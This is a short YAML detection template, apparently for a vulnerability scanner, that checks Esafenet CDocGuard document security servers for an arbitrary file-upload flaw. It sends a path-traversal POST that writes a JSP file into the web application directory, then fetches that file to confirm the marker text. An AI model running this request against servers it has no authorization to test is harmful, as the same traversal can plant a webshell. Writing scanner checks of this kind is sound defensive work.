name: 亿赛通-电子文档安全管理系统-DecryptApplicationService2-文件上传
description: >-
  文件上传
alwaysExecute: false
matchCount: 2
rules:
  - method: POST
    path: /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/Rscantest.jsp
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: >-
      Rscan
    expression:
      status: 200
  - method: GET
    path: /CDGServer3/Rscantest.jsp
    expression:
      status: 200
      body_all: ["Rscan"]